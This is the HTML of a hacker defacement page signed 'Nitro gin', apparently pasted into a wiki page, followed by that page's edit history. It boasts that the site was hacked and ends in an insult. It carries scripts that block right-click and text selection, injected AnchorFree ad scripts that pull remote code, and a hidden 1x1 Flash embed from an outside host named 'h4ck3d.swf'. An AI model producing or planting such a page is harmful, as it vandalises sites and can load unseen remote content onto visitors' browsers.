<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>..:::Site Hacked by Nitro gin :::..</title>
<meta http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1">
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="imagetoolbar" content="no">
<meta name="revisit-after" content="3">
<meta name="rating" content="general">
<meta name="classification" content="Internet Services">
<meta name="googlebot" content="index,follow">
<meta name="google rank" content="1">
<meta name="robots" content="all">
<meta name="robots schedule" content="auto">
<meta name="distribution" content="global">
<script>
/*
An object-oriented Typing Text script, to allow for multiple instances.
A script that causes any text inside any text element to be "typed out", one letter at a time. Note that any HTML tags will not be included in the typed output, to prevent them from causing problems. Tested in Firefox v1.5.0.1, Opera v8.52, Konqueror v3.5.1, and IE v6.
Browsers that do not support this script will simply see the text fully displayed from the start, including any HTML tags.
Functions defined:
TypingText(element, [interval = 100,] [cursor = "",] [finishedCallback = function(){return}]):
Create a new TypingText object around the given element. Optionally
specify a delay between characters of interval milliseconds.
cursor allows users to specify some HTML to be appended to the end of
the string whilst typing. Optionally, can also be a function which
accepts the current text as an argument. This allows the user to
create a "dynamic cursor" which changes depending on the latest character
or the current length of the string.
finishedCallback allows advanced scripters to supply a function
to be executed on finishing. The function must accept no arguments.
TypingText.run():
Run the effect.
static TypingText.runAll():
Run all TypingText-enabled objects on the page.
*/
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
this.running = true; // Never run.
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
return;
}
if(this.currentText == "") this.element.innerHTML = "";
// this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inHTMLEntity) {
this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else {
this.currentText += this.origText.charAt(this.currentChar);
}
this.element.innerHTML = this.currentText;
this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>
<style>
body {
background: black url(""); background-image:url(http://i.imgur.com/gXAJX.gif);
background-repeat: repeat;
background-position:center;
font: normal 80% Verdana;
margin-top: 0px;
margin-left: 0px;
padding: 0;
margin-right: 0px;
}
/* REMOVE HORIZONTAL SCROLLBAR*/ body { overflow-x: hidden; } /* REMOVE VERTICAL SCROLLBAR*/ body { overflow-y: hidden; }
td{font-family: verdana; font-size: 9pt; color: #00ff00}
a{font-family: verdana; font-size: 12pt; color: #00ff00}
/* REMOVE HORIZONTAL SCROLLBAR*/ body { overflow-x: hidden; } body { overflow-y: hidden; } </style><br><br>
<body style="background-color: rgb(0, 0, 0);"><script type="text/javascript">ANCHORFREE_VERSION="623161526"</script><script type='text/javascript'>var _AF2$={'SN':'HSSHIELD00ES','IP':'50.117.61.254','CH':'HSSCNL000406','CT':'XX','HST':'&toAdltIntr=1&gtrk=y','AFH':'hss106','RN':Math.floor(Math.random()*999),'TOP':(parent.location!=document.location||top.location!=document.location)?0:1,'AFVER':'2.88','fbw':false,'FBWCNT':0, 'FBWCNTNAME':'FBWCNT_CHROME', 'NOFBWNAME':'NO_FBW_CHROME'};if(/^(.*,)?(11C)(,.*)?$/g.exec(_AF2$.CT)!=null&&_AF2$.CH!='HSSCNL000242'){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/par.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}document.write("<style type='text/css' title='AFc_css"+_AF2$.RN+"' >.AFc_body"+_AF2$.RN+"{} .AFc_all"+_AF2$.RN+",a.AFc_all"+_AF2$.RN+":hover,a.AFc_all"+_AF2$.RN+":visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style>");</script><style type='text/css'>AFhss_dpnone{display:none;width:0;height:0}</style><img src="about:blank" id="AFhss_trk0" name="AFhss_trk0" style="display:none;width:0" /><img src="about:blank"id="AFhss_trk"name="AFhss_trk"style="display:none;width:0"/><div id="AFhss_dfs"class="AFhss_dpnone"><div id="AFhss_adrp0"class="AFhss_dpnone"></div><div id="AFhss_adrp1"class="AFhss_dpnone"></div><div id="AFhss_adrp2"class="AFhss_dpnone"></div><div id="AFhss_adrp3"class="AFhss_dpnone"></div><div id="AFhss_adrp4"class="AFhss_dpnone"></div><div id="AFhss_adrp5"class="AFhss_dpnone"></div><div id="AFhss_adrp6"class="AFhss_dpnone"></div><div id="AFhss_adrp7"class="AFhss_dpnone"></div><div id="AFhss_adrp8"class="AFhss_dpnone"></div><div id="AFhss_adrp9"class="AFhss_dpnone"></div></div><script type='text/javascript'>if(_AF2$.TOP==1){if(_AF2$.CH=='HSSCNL000242'){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/41.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}else if(_AF2$.CH=='HSSCNL000248'){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/60s.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}else if(_AF2$.CH=='HSSCNL000249'){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/61s.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}else if(_AF2$.CH=='HSSCNL000484' || _AF2$.CH=='HSSCNL000447' || _AF2$.CH=='HSSCNL000504' || _AF2$.CH=='HSSCNL000505' || _AF2$.CH=='HSSCNL000506'){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/62fbw-c2ask.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}else{var m=new RegExp(/&FBWCNT_CHROME=([0-9]+)/g).exec(_AF2$.HST);_AF2$.FBWCNT=(m!=null&&typeof(m[1])!='undefined')?parseInt(m[1]):0;if(parseFloat(_AF2$.AFVER)>=2.03&&/NO_FBW_CHROME/.test(_AF2$.HST)==false&&_AF2$.FBWCNT<10&&navigator.appVersion.indexOf("Win")!=-1){_AF2$.strl=2048;_AF2$.fbw=true}document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/62_new.js?v="+ANCHORFREE_VERSION+9997+"' type='text/javascript'></scr"+"ipt>")}}</script>
<center><img style="width: 500px; height: 75px;"
src="http://i.imgur.com/Zr170.gif?1?3187">
<a href='#footer'><img border='0' style='position:fixed; bottom:1; right:0;' src="http://i.imgur.com/DYwb7.gif"
alt="" /></a><a href='#footer'><img border='0' style='position:fixed; bottom:2; left:0;' src="http://i.imgur.com/DYwb7.gif"
alt="" /></a>
<script language="Javascript" type="text/javascript">
//<![CDATA[
<!-- Begin
document.oncontextmenu = function(){return false}
// End -->
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
// IE Evitar seleccion de texto
document.onselectstart=function(){
if (event.srcElement.type != "text" && event.srcElement.type != "textarea" && event.srcElement.type != "password")
return false
else return true;
};
// FIREFOX Evitar seleccion de texto
if (window.sidebar){
document.onmousedown=function(e){
var obj=e.target;
if (obj.tagName.toUpperCase() == "INPUT" || obj.tagName.toUpperCase() == "TEXTAREA" || obj.tagName.toUpperCase() == "PASSWORD")
return true;
/*else if (obj.tagName=="BUTTON"){
return true;
}*/
else
return false;
}
}
// End -->
//]]>
</script>
<script language="Javascript" type="text/javascript">
//<![CDATA[
<!-- Begin
document.ondragstart = function(){return false}
// End -->
//]]>
</script>
<center>
<p></p>
</center>
<center><font color="red"><b><font =""><br><br>
</font><font color="red" face="Courier New"
size="11">.::</font></font><font color="#FFFFFF" face="Courier New" size="11">Si</font><font color="red" face="Courier New" size="11">te</font><font color="#FFFFFF" face="Courier New" size="11">*</font><font color="red" face="Courier New" size="11">Ha</font><font color="#FFFFFF" face="Courier New" size="11">Ck</font><font color="red" face="Courier New" size="11">ed*</font><font color="#FFFFFF" face="Courier New" size="11">B</font><font color="red" face="Courier New" size="11">y</font><font color="#FFFFFF" face="Courier New" size="11">*</font><font color="red" face="Courier New" size="11">N</font><font color="#FFFFFF" face="Courier New" size="11">it</font><font color="red" face="Courier New" size="11">ro
g</font><font color="#FFFFFF" face="Courier New" size="11">i</font><font color="red" face="Courier New" size="11">n::.
</font></b></b></font></center><div id="example1"></div>
<p id="example2">
<font color="red"><b><font color="red"><b><font
color="Red" face="Courier New" size="5"><b><font
color="yellow" face="Courier New" size="4"
<b><font color="#00ff00" face="Courier New" size="6">"Sorry Admin" =), Your Security Is Nula...^_^<br>
<b><font color="White" face="Courier New"
size="6"> Operation HaCked Algerian !!<b><br><br>
<b><font color="#00ff00" face="Courier New"
size="6"> ..:::I work in security:::...
Algerian hacker University
:::..</font></b><br>
<b><font color="White" face="Courier New"
size="6"> Skype : abdou.dz33.. ::: ... ^_* ",

<br>
<b><font color="gold"face="Courier New"
face="Courier New" size="10"> ..:::*Nitro gin *:::..
..***** Fuck OFF*****.......
</font></b></font></b></font></b></font></font></b></font></b></font></b></font></b></font></font></font></b></font></b></font></b></font></b></font></p>
<center><font color="red"><b><font
color="red"><font color="red"><b><font
color="red"><b><font color="red"><b><font
color="red"><b><font color="Red"
face="Courier New" size="5"><b><font
color="#e3e4fa" face="Courier New" size="4"><b><font
color="#e3e4fa" face="Courier New" size="4"><b><font
color="#e3e4fa" face="Courier New" size="4"><font
color="#e3e4fa" face="Courier New" size="4"><b><font
color="#00ff00" face="Courier New" size="5"><b><font
color="#e3e4fa" face="Courier New" size="4"><b><font
color="purple" face="Courier New" size="6"><b><font
face="Courier New" size="5"><b><font
color="#e3e4fa" face="Courier New" size="4"><b><font
color="#e3e4fa" face="Courier New" size="4"><b><font
color="#e3e4fa" face="Courier New" size="4"><font
color="#e3e4fa" face="Courier New" size="4"><b><font
color="#00ff00" face="Courier New" size="5"><b><font
color="#e3e4fa" face="Courier New" size="4"><b><font
color="purple" face="Courier New" size="6"><b><font
color="#e3e4fa" face="Courier New" size="4"><font
color="red"><b><font color="Red"
face="Courier New" size="4"><b><font
color="#e3e4fa" face="Courier New" size="4">
<script type="text/javascript">
//Define first typing example:
new TypingText(document.getElementById("example1"));
//Define second typing example (use "slashing" cursor at the end):
new TypingText(document.getElementById("example2"), 40, function(i){
var ar = new Array("_"," ","_","_"); return " " + ar[i.length %
ar.length]; });
//Type out examples:
TypingText.runAll();
</script></font></b></font></b></font></font></b></font></b></font></b></font></b></font></font></b></font></b></font></b></font></b></font></b></font></b></font></b></font></font></b></font>
<embed =""></center>
</center>
<embed allowfullscreen="true" allowscriptaccess="always"
<center>

// ]]>
</script>
</script>
<style type="text/css">
<!--
body { cursor: crosshair}
-->
</style>
<style type="text/css">
body, a, a:hover {cursor: url(http://www.fotosbebes.org/cursores/pun12.cur),progress;}
</style><span style="font:tahoma; font-size:9px;"><a href="/"></a>
</center>
<embed allowfullscreen="true" allowscriptaccess="always"
type="application/x-shockwave-flash"
src="http://error-404.do.am/50256-h4ck3d.swf"
height="1" width="1">
<style>
<body>
Page History
Date/CommentUserIPVersion
01 Feb 2021 (15:48 UTC)
Rollback to version 152 by spiderr
spiderr76.182.69.235155
Current • Source
Unknown178.197.201.79154
View • Compare • Difference • Source
Unknown178.197.201.79153
View • Compare • Difference • Source
spiderr76.182.69.235152
View • Compare • Difference • Source
spiderr107.134.22.87150
View • Compare • Difference • Source
Unknown103.23.60.129149
View • Compare • Difference • Source
Unknown119.30.45.88148
View • Compare • Difference • Source
Unknown180.211.196.208146
View • Compare • Difference • Source
Unknown180.211.196.208145
View • Compare • Difference • Source
Unknown119.30.47.111143
View • Compare • Difference • Source
Unknown103.23.61.73140
View • Compare • Difference • Source
Unknown103.23.60.129139
View • Compare • Difference • Source
spiderr107.134.22.87138
View • Compare • Difference • Source
spiderr24.171.168.128137
View • Compare • Difference • Source
spiderr24.171.168.128135
View • Compare • Difference • Source
spiderr24.171.168.128134
View • Compare • Difference • Source
spiderr24.171.168.129133
View • Compare • Difference • Source
spiderr24.171.168.129132
View • Compare • Difference • Source
spiderr24.171.168.129131
View • Compare • Difference • Source
spiderr24.171.168.129129
View • Compare • Difference • Source
spiderr24.171.168.128128
View • Compare • Difference • Source
spiderr24.106.202.123127
View • Compare • Difference • Source
spiderr75.182.99.224126
View • Compare • Difference • Source
spiderr75.182.99.224121
View • Compare • Difference • Source
spiderr75.182.99.224119
View • Compare • Difference • Source
spiderr99.127.242.25118
View • Compare • Difference • Source